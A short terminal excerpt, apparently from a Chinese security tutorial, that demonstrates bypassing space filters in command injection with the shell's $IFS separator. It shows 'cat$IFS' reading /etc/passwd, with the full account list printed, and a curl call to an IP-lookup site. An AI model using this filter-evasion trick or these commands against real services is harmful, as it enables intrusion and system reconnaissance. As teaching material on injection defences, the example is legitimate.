[ root@iZ28wg1kditZ ~]# cat$IFS "/etc/passwd"
root : x : 0 : 0 : root :/ root :/ bin / bash
bin : x : 1 : 1 : bin :/ bin :/ sbin / nologin
daemon : x : 2 : 2 : daemon :/ sbin :/ sbin / nologin
adm : x : 3 : 4 : adm :/ var / adm :/ sbin / nologin
lp : x : 4 : 7 : lp :/ var / spool / lpd :/ sbin / nologin
sync : x : 5 : 0 : sync :/ sbin :/ bin / sync
shutdown : x : 6 : 0 : shutdown :/ sbin :/ sbin / shutdown
halt : x : 7 : 0 : halt :/ sbin :/ sbin / halt
mail : x : 8 : 12 : mail :/ var / spool / mail :/ sbin / nologin
uucp : x : 10 : 14 : uucp :/ var / spool / uucp :/ sbin / nologin
operator : x : 11 : 0 : operator :/ root :/ sbin / nologin
games : x : 12 : 100 : games :/ usr / games :/ sbin / nologin
gopher : x : 13 : 30 : gopher :/ var / gopher :/ sbin / nologin
ftp : x : 14 : 50 : FTP User :/ var / ftp :/ sbin / nologin
nobody : x : 99 : 99 : Nobody :/:/ sbin / nologin
dbus : x : 81 : 81 : System message bus :/:/ sbin / nologin
vcsa : x : 69 : 69 : virtual console memory owner :/ dev :/ sbin / nologin
abrt : x : 173 : 173 ::/ etc / abrt :/ sbin / nologin
haldaemon : x : 68 : 68 : HAL daemon :/:/ sbin / nologin
ntp : x : 38 : 38 ::/ etc / ntp :/ sbin / nologin
saslauth : x : 499 : 76 : "Saslauthd user" :/ var / empty / saslauth :/ sbin / nologin
postfix : x : 89 : 89 ::/ var / spool / postfix :/ sbin / nologin
sshd : x : 74 : 74 : Privilege - separated SSH :/ var / empty / sshd :/ sbin / nologin
tcpdump : x : 72 : 72 ::/:/ sbin / nologin
nscd : x : 28 : 28 : NSCD Daemon :/:/ sbin / nologin
apache : x : 48 : 48 : Apache :/ var / www :/ sbin / nologin
mysql : x : 27 : 27 : MySQL Server :/ var / lib / mysql :/ bin / bash
exim : x : 93 : 93 ::/ var / spool / exim :/ sbin / nologin
dockerroot : x : 498 : 498 : Docker User :/ var / lib / docker :/ sbin / nologin
rpc : x : 32 : 32 : Rpcbind Daemon :/ var / cache / rpcbind :/ sbin / nologin
rpcuser : x : 29 : 29 : RPC Service User :/ var / lib / nfs :/ sbin / nologin
nfsnobody : x : 65534 : 65534 : Anonymous NFS User :/ var / lib / nfs :/ sbin / nologin
[ root@iZ28wg1kditZ ~]# curl$IFS "ip.cn"
当前 IP : 121.42 . xxx . xxx 来自:山东省青岛市 阿里云
[ root@iZ28wg1kditZ ~]#
如果是linux的话,可以使用环境变量中的分隔符$IFS来进行绕过。